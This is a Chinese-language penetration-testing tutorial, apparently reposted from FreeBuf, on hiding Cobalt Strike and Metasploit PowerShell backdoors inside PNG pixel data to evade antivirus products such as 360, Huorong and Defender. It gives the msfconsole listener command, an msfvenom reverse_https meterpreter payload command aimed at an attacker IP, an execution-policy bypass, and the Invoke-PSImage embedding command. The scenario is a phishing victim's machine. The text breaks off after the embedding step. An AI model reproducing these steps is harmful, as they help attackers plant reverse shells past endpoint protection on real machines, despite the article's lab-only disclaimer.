渗透测试之地基免杀篇:隐写RGB过所有杀软 – 作者:dayuxiyou

系列文章

专辑:渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

如今杀毒软件不断的更新升级,在渗透测试中和HVV中如何绕过杀软成为渗透着们核心的技术,没有免杀就无法深入内网横向,往下看带来隐写RGB免杀的过程。

观望我写的好几篇免杀,都具有免杀效果,今天给大家带来将payload隐写到像素RGB中,从环境部署、CS和MSF的payload生成、到上线免杀控制、最后五次分析底层原理,最后总结给了点小建议,开始!

二、环境介绍

1608213735_5fdb64e7aa0655a649f8f.png!small?1608213737710

黑客(攻击者)

IP:192.168.253.8

系统:kali.2020.4

windows 10系统是黑客用于制作隐写RGB方式生成png图片的环境。

VPS服务器:

IP:192.168.253.8

此次环境将使用kali2020.4进行模拟VPS服务器http服务。

办公区域:

系统:windwos 10

IP:192.168.253.17

存在:360、360杀毒、火绒、deferencer,以及全球和全国杀软平台检测。

目前黑客通过kali系统进行攻击行为,通过钓鱼获得了对方的权限后,发现对方电脑上存在360、360杀毒、火绒、deferencer直接被杀软进行了查杀,无法进行反弹shell获得权限,如今将演示利用隐写术将shellcode隐写入PNG图片RGB像素中,隐藏后门代码,以及底层分析生成PNG,并控制对方的过程。

三、环境部署

windows 10 环境上下载好PSImage源码,以及准备好一张jpg图片和powershell shellcode后门文件。

1、下载源代码

将 PSImage 源代码下载到本地:

https://github.com/dayuxiyou/Invoke-PSImage

1612427652_601bb18443810827353ec.png!small?1612427653421

2、CS生成后门

1612427657_601bb189cf9a9b365732e.png!small?1612427658372

Cobalt Strike生成powershell的后门payload.ps1。

3、MSF生成后门

1612427662_601bb18ede7c94d3a65ab.png!small?1612427665151

msfconsole -x “use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost 192.168.253.8; set lport 5555; exploit -j; “

开启监听。

1612427668_601bb19469927147fadff.png!small?1612427670627

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.253.8 LPORT=5555 -f psh-reflection > msf-dayu.ps1

生成msf后门文件msf-dayu.ps1。

1612427673_601bb199520499487998f.png!small?1612427673794

最后准备好一张jpg图片,全部放在文件夹内即可。

四、隐写RGB免杀测试

以下操作在Windows 10系统环境进行生成恶意文件png。

1、测试CS后门隐写

1612427678_601bb19e8ad31b5ba920b.png!small?1612427681008

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

进行更改执行策略,可帮助防止在执行ps1脚本时产生阻拦等报错,达不到效果。

1612427683_601bb1a36e415065d65f6.png!small?1612427684204

Import-Module .\Invoke-PSimage.ps1

利用import_module来通过字符串导入Invoke-PSimage.ps1模块。

1612427689_601bb1a90caf407ac1a89.png!small?1612427693052

Invoke-PSImage -Script .\cs-dayu.ps1 -Image .\dayu.jpg -Out .\cs-dayu.png -Web

1. -script 表示你要写入图片中的powershell脚本 2. -image 表示待写入恶意代码的图片 3. -Out 表示最后写入成功的图片 4. -Web 输出用于使用Net.WebClient从Web读取图像的命令。您将需要托管图像并将URL插入命令中

通过隐写RGB,将shellcode隐写入了像素低高位中,生成了png图片。另外给出了一串powershell代码。

来源:freebuf.com 2021-02-04 11:54:27 by: dayuxiyou

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论